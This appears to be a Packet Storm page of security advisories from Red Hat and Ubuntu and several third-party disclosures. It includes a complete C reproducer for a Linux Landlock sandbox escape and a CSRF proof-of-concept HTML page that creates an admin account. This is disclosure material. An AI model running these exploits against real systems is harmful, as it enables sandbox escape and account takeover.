Red Hat Security Advisory 2024-5690-03 - An update for the 389-ds:1.4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include denial of service and heap overflow vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5690.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: 389-ds:1.4 security update  
Advisory ID:        RHSA-2024:5690-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5690  
Issue date:         2024-08-21  
Revision:           03  
CVE Names:          CVE-2024-1062  
====================================================================

Summary: 

An update for the 389-ds:1.4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. 

Security Fix(es):

* 389-ds-base: a heap overflow leading to denail-of-servce while writing a value larger than 256 chars (in log_entry_attr) (CVE-2024-1062)

* 389-ds-base: Malformed userPassword may cause crash at do_modify in slapd/modify.c (CVE-2024-2199)

* 389-ds-base: potential denial of service via specially crafted kerberos AS-REQ request (CVE-2024-3657)

* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1062

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2261879  
https://bugzilla.redhat.com/show_bug.cgi?id=2267976  
https://bugzilla.redhat.com/show_bug.cgi?id=2274401  
https://bugzilla.redhat.com/show_bug.cgi?id=2292104  
https://issues.redhat.com/browse/RHEL-50831

Red Hat Security Advisory 2024-5690-03

Red Hat Security Advisory 2024-5689-03 - An update for python3.9 is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include a traversal vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5689.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3.9 security updateAdvisory ID:        RHSA-2024:5689-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5689Issue date:         2024-08-21Revision:           03CVE Names:          CVE-2023-6597====================================================================Summary: An update for python3.9 is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6597References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2276518

Red Hat Security Advisory 2024-5689-03

Red Hat Security Advisory 2024-5662-03 - An update is now available for Red Hat Satellite 6.15 for RHEL 8.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5662.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Satellite 6.15.3 Security Update  
Advisory ID:        RHSA-2024:5662-03  
Product:            Red Hat Satellite 6  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5662  
Issue date:         2024-08-21  
Revision:           03  
CVE Names:          CVE-2024-24680  
====================================================================

Summary: 

An update is now available for Red Hat Satellite 6.15 for RHEL 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_satellite/6.15/html/updating_red_hat_satellite/index

CVEs:

CVE-2024-24680

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_satellite/6.15/html/updating_red_hat_satellite/index  
https://bugzilla.redhat.com/show_bug.cgi?id=2261856  
https://bugzilla.redhat.com/show_bug.cgi?id=2266045  
https://bugzilla.redhat.com/show_bug.cgi?id=2272563  
https://bugzilla.redhat.com/show_bug.cgi?id=2275989  
https://bugzilla.redhat.com/show_bug.cgi?id=2279476  
https://issues.redhat.com/browse/SAT-25063  
https://issues.redhat.com/browse/SAT-25522  
https://issues.redhat.com/browse/SAT-26450  
https://issues.redhat.com/browse/SAT-26452  
https://issues.redhat.com/browse/SAT-26453  
https://issues.redhat.com/browse/SAT-26454  
https://issues.redhat.com/browse/SAT-26456  
https://issues.redhat.com/browse/SAT-26458  
https://issues.redhat.com/browse/SAT-26459

Red Hat Security Advisory 2024-5662-03

In the Linux kernel, vulnerabilities in netfilter, tls, and tty have been resolved.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 LTS  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oracle - Linux kernel for Oracle Cloud systems

Details

In the Linux kernel, the following vulnerability has been  
resolved: netfilter: nf_tables: disallow timeout for anonymous sets  
Never used from userspace, disallow these parameters.(CVE-2023-52620)

In the Linux kernel, the following vulnerability has been  
resolved: tls: fix race between tx work scheduling and socket close  
Similarly to previous commit, the submitting thread (recvmsg/sendmsg)  
may exit as soon as the async crypto handler calls complete(). Reorder  
scheduling the work before calling complete(). This seems more logical  
in the first place, as it’s the inverse order of what the submitting  
thread will do.(CVE-2024-26585)

In the Linux kernel, the following vulnerability has been  
resolved: tty: n_gsm: fix possible out-of-bounds in gsm0_receive()  
Assuming the following: - side A configures the n_gsm in basic option  
mode - side B sends the header of a basic option mode frame with data  
length 1 - side A switches to advanced option mode - side B sends 2 data  
bytes which exceeds gsm->len Reason: gsm->len is not used in advanced  
option mode. - side A switches to basic option mode - side B keeps  
sending until gsm0_receive() writes past gsm->buf Reason: Neither  
gsm->state nor gsm->len have been reset after reconfiguration. Fix this  
by changing gsm->count to gsm->len comparison from equal to less than.  
Also add upper limit checks against the constant MAX_MRU in  
gsm0_receive() and gsm1_receive() to harden against memory corruption of  
gsm->len and gsm->mru. All other checks remain as we still need to limit  
the data according to the user configuration and actual payload size.]  
(CVE-2024-36016)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    gkeop - 106.1  
    ibm - 106.1  
    lowlatency - 106.1  
    oracle - 106.1

Ubuntu 18.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    lowlatency - 106.1  
    oracle - 106.1

Ubuntu 16.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    lowlatency - 106.1

Ubuntu 22.04 LTS  
    aws - 106.1  
    azure - 106.1  
    gcp - 106.1  
    generic - 106.1  
    gke - 106.1  
    ibm - 106.1  
    oracle - 106.1

Ubuntu 14.04 LTS  
    generic - 106.1  
    lowlatency - 106.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-52620  
-   CVE-2024-26585  
-   CVE-2024-36016

Kernel Live Patch Security Notice LSN-0106-1

Ubuntu Security Notice 6969-1 - It was discovered that Cacti did not properly apply checks to the "Package Import" feature. An attacker could possibly use this issue to perform arbitrary code execution. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. It was discovered that Cacti did not properly sanitize values when using javascript based API. A remote attacker could possibly use this issue to inject arbitrary javascript code resulting into cross-site scripting vulnerability. This issue only affected Ubuntu 24.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6969-1  
August 20, 2024

cacti vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Cacti.

Software Description:  
- cacti: web interface for graphing of monitoring systems

Details:

It was discovered that Cacti did not properly apply checks to the "Package  
Import" feature. An attacker could possibly use this issue to perform  
arbitrary code execution. This issue only affected Ubuntu 24.04 LTS, Ubuntu  
22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-25641)

It was discovered that Cacti did not properly sanitize values when using  
javascript based API. A remote attacker could possibly use this issue to  
inject arbitrary javascript code resulting into cross-site scripting  
vulnerability. This issue only affected Ubuntu 24.04 LTS. (CVE-2024-29894)

It was discovered that Cacti did not properly sanitize values when managing  
data queries. A remote attacker could possibly use this issue to inject  
arbitrary javascript code resulting into cross-site scripting  
vulnerability. (CVE-2024-31443)

It was discovered that Cacti did not properly sanitize values when reading  
tree rules with Automation API. A remote attacker could possibly use this  
issue to inject arbitrary javascript code resulting into cross-site  
scripting vulnerability. (CVE-2024-31444)

It was discovered that Cacti did not properly sanitize  
"get_request_var('filter')" values in the "api_automation.php" file. A  
remote attacker could possibly use this issue to perform SQL injection  
attacks. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-31445)

It was discovered that Cacti did not properly sanitize data stored in  
"form_save()" function in the "graph_template_inputs.php" file. A remote  
attacker could possibly use this issue to perform SQL injection attacks.  
(CVE-2024-31458)

It was discovered that Cacti did not properly validate the file urls from  
the lib/plugin.php file. An attacker could possibly use this issue to  
perform arbitrary code execution. (CVE-2024-31459)

It was discovered that Cacti did not properly validate the data stored in  
the "automation_tree_rules.php". A remote attacker could possibly use this  
issue to perform SQL injection attacks. This issue only affected Ubuntu  
24.04 LTS, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.  
(CVE-2024-31460)

It was discovered that Cacti did not properly verify the user password.  
An attacker could possibly use this issue to bypass authentication  
mechanism. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-34360)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  cacti                           1.2.26+ds1-1ubuntu0.1

Ubuntu 22.04 LTS  
  cacti                           1.2.19+ds1-2ubuntu1.1

Ubuntu 20.04 LTS  
  cacti                           1.2.10+ds1-1ubuntu1.1

Ubuntu 18.04 LTS  
  cacti                           1.1.38+ds1-1ubuntu0.1~esm3  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  cacti                           0.8.8f+ds1-4ubuntu4.16.04.2+esm2  
                                  Available with Ubuntu Pro

Ubuntu 14.04 LTS  
  cacti                           0.8.8b+dfsg-5ubuntu0.2+esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6969-1  
  CVE-2024-25641, CVE-2024-29894, CVE-2024-31443, CVE-2024-31444,  
  CVE-2024-31445, CVE-2024-31458, CVE-2024-31459, CVE-2024-31460,  
  CVE-2024-34340

Package Information:  
  https://launchpad.net/ubuntu/+source/cacti/1.2.26+ds1-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/cacti/1.2.19+ds1-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/cacti/1.2.10+ds1-1ubuntu1.1

Ubuntu Security Notice USN-6969-1

Ubuntu Security Notice 6967-1 - It was discovered that some Intel® Core™ Ultra Processors did not properly isolate the stream cache. A local authenticated user could potentially use this to escalate their privileges. It was discovered that some Intel® Processors did not properly isolate the stream cache. A local authenticated user could potentially use this to escalate their privileges. It was discovered that some Intel® Processors did not correctly transition between the executive monitor and SMI transfer monitor. A privileged local attacker could use this to escalate their privileges.

==========================================================================  
Ubuntu Security Notice USN-6967-1  
August 19, 2024

intel-microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

It was discovered that some Intel® Core™ Ultra Processors did not properly  
isolate the stream cache. A local authenticated user could potentially use  
this to escalate their privileges. (CVE-2023-42667)

It was discovered that some Intel® Processors did not properly isolate the  
stream cache. A local authenticated user could potentially use this to  
escalate their privileges. (CVE-2023-49141)

It was discovered that some Intel® Processors did not correctly transition  
between the executive monitor and SMI transfer monitor (STM). A privileged  
local attacker could use this to escalate their privileges.  
(CVE-2024-24853)

It was discovered that some 3rd, 4th, and 5th Generation Intel® Xeon®  
Processors failed to properly implement a protection mechanism. A local  
attacker could use this to potentially escalate their privileges.  
(CVE-2024-24980)

It was discovered that some 3rd Generation Intel Xeon Scalable Processors  
did not properly handle mirrored regions with different values. A  
privileged local user could use this to cause a denial of service (system  
crash). (CVE-2024-25939)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.24.04.2

Ubuntu 22.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.22.04.2

Ubuntu 20.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.20.04.2

Ubuntu 18.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.18.04.1+esm2  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  intel-microcode                 3.20240813.0ubuntu0.16.04.1+esm2  
                                  Available with Ubuntu Pro

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6967-1  
  CVE-2023-42667, CVE-2023-49141, CVE-2024-24853, CVE-2024-24980,  
  CVE-2024-25939

Package Information:  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240813.0ubuntu0.24.04.2  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240813.0ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20240813.0ubuntu0.20.04.2

Ubuntu Security Notice USN-6967-1

Akuvox Smart Intercom/Doorphone suffers from an unauthenticated live stream disclosure when requesting video.cgi endpoint on port 8080. Many versions are affected.

    Akuvox Smart Intercom/Doorphone Unauthenticated Stream DisclosureVendor: The Akuvox CompanyProduct web page: https://www.akuvox.comAffected version: Doorphone:                    S539                    S532                    X916                    X915                    X912                    R29                  Intercom:                    R20K-2                    R20A-2                    C313W-2                    NS-2                    NC-2                    NX-2                  Firmware: 912.30.1.137Summary: Vandal-resistant Door Phone for High-end Buildings. Offeringtop-of-the-line features, Akuvox X912 is targeted at high-end residentialand commercial projects. With a compact size, it is perfect for buildingswith limited installation space.Desc: The application suffers from an unauthenticated live stream disclosurewhen requesting video.cgi endpoint on port 8080.Tested on: lighttpd/1.4.30           EasyHttpServerVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5826Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5826.php25.02.2024--$ firefox http://192.168.1.2:8080/video.cgi

Akuvox Smart Intercom/Doorphone Unauthenticated Stream Disclosure

Linux has an issue where landlock can be disabled thanks to a missing cred_transfer hook.

    Linux: landlock can be disabled thanks to missing cred_transfer hook; and Smack looks dodgy tooI found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it:When a process' cred struct is replaced, this _almost_ always invokes the cred_prepare LSM hook; but in one special case (when KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the cred_transfer LSM hook is used instead. Landlock only implements the cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes all information on Landlock restrictions to be lost.The one piece of good news about this is that it requires access to the keyctl() syscall; and I think Landlock is typically used in combination with some kind of seccomp allowlist, which will probably _usually_ make this issue unreachable from sandboxed code?I had a look at the other LSMs that have cred_prepare or cred_transfer hooks: - AppArmor handles both hooks in the same way, that's fine - SELinux handles both hooks in the same way, that's fine - Tomoyo only handles cred_prepare, not cred_transfer, but it only uses the   hook for something weird that's unrelated to the actual cred structs, so   that's probably fine - Smack handles both but handles them differently; smack_cred_transfer() only   transfers a subset of the information that smack_cred_prepare() transfers.   That looks a bit dodgy to me but I don't really understand Smack - Casey, can   you check if Smack handles KEYCTL_SESSION_TO_PARENT correctly?I will send a suggested fix for Landlock in a minute.Here's a reproducer for escaping from Landlock confinement, tested on latestmainline (at commit 786c8248dbd33a5a7a07f7c6e55a7bfc68d2ca48):```user@vm:~/landlock-houdini$ cat landlock-houdini.c#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <stdint.h>#include <stdlib.h>#include <fcntl.h>#include <stdio.h>#include <sys/prctl.h>#include <sys/wait.h>#include <sys/syscall.h>#include <linux/keyctl.h>/* stuff from the landlock header */struct landlock_ruleset_attr {        uint64_t handled_access_fs;};#define LANDLOCK_ACCESS_FS_WRITE_FILE                   (1ULL << 1)#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})int main(void) {  /* == tell landlock to block opening any files for writing == */  SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));        struct landlock_ruleset_attr ruleset_attr = {                .handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE        };  int ruleset = SYSCHK(syscall(444/*__NR_landlock_create_ruleset*/, &ruleset_attr, sizeof(ruleset_attr), 0));  SYSCHK(syscall(446/*__NR_landlock_restrict_self*/, ruleset, 0));  /* == make sure we really can't open files for writing == */  int open_res = open(\"/dev/null\", O_WRONLY);  if (open_res != -1)    errx(1, \"open for write still worked after sandboxing???\");  perror(\"open for write failed as expected\");  /* == try to escape from landlock == */  /* needed for KEYCTL_SESSION_TO_PARENT permission checks */  SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));  pid_t child = SYSCHK(fork());  if (child == 0) {    /*     * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a different session     * keyring in the child, so make that happen.     */    SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));    /*     * This is where the magic happens:     * KEYCTL_SESSION_TO_PARENT installs credentials on the parent that     * never go through the cred_prepare hook, this path uses cred_transfer     * instead.     * So basically after this call, the parent's landlock restrictions     * are gone.     */    SYSCHK(syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0));    exit(0);  }  int wstatus;  SYSCHK(waitpid(child, &wstatus, 0));  if (!WIFEXITED(wstatus) || WEXITSTATUS(wstatus) != 0)    errx(1, \"child failed unexpectedly, unable to test bug\");  /* retry the same operation that was previously blocked to see if we escaped */  int open_res2 = open(\"/dev/null\", O_WRONLY);  if (open_res2 != -1)    errx(1, \"open for write works again, VULNERABLE!\");  perror(\"open for write failed as it should, seems fixed\");}user@vm:~/landlock-houdini$ gcc -o landlock-houdini landlock-houdini.c -Walluser@vm:~/landlock-houdini$ ./landlock-houdiniopen for write failed as expected: Permission deniedlandlock-houdini: open for write works again, VULNERABLE!user@vm:~/landlock-houdini$```This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-10-22.For more details, see the Project Zero vulnerability disclosure policy:https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlRelated CVE Numbers: CVE-2024-42318.Found by: jannh@google.com

Linux Landlock Logic Bug

Ubuntu Security Notice 6968-1 - Noah Misch discovered that PostgreSQL incorrectly handled certain SQL objects. An attacker could possibly use this issue to execute arbitrary SQL functions as the superuser.

==========================================================================  
Ubuntu Security Notice USN-6968-1  
August 19, 2024

postgresql-12, postgresql-14, postgresql-16 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PostgreSQL could execute arbitrary SQL functions as the superuser  
if it received a specially crafted SQL object.

Software Description:  
- postgresql-16: Object-relational SQL database  
- postgresql-14: Object-relational SQL database  
- postgresql-12: Object-relational SQL database

Details:

Noah Misch discovered that PostgreSQL incorrectly handled certain  
SQL objects. An attacker could possibly use this issue to execute  
arbitrary SQL functions as the superuser.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  postgresql-16                   16.4-0ubuntu0.24.04.1  
  postgresql-client-16            16.4-0ubuntu0.24.04.1

Ubuntu 22.04 LTS  
  postgresql-14                   14.13-0ubuntu0.22.04.1  
  postgresql-client-14            14.13-0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  postgresql-12                   12.20-0ubuntu0.20.04.1  
  postgresql-client-12            12.20-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6968-1  
  CVE-2024-7348

Package Information:  
  https://launchpad.net/ubuntu/+source/postgresql-16/16.4-0ubuntu0.24.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-14/14.13-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-12/12.20-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6968-1

Lost and Found Information System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Lost and Found Information System v1.0 v1.0 CSRF Vulnerability                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/php-lfis/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server)   
  using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request   
  as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-lfis\/classes\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Source

Packet Storm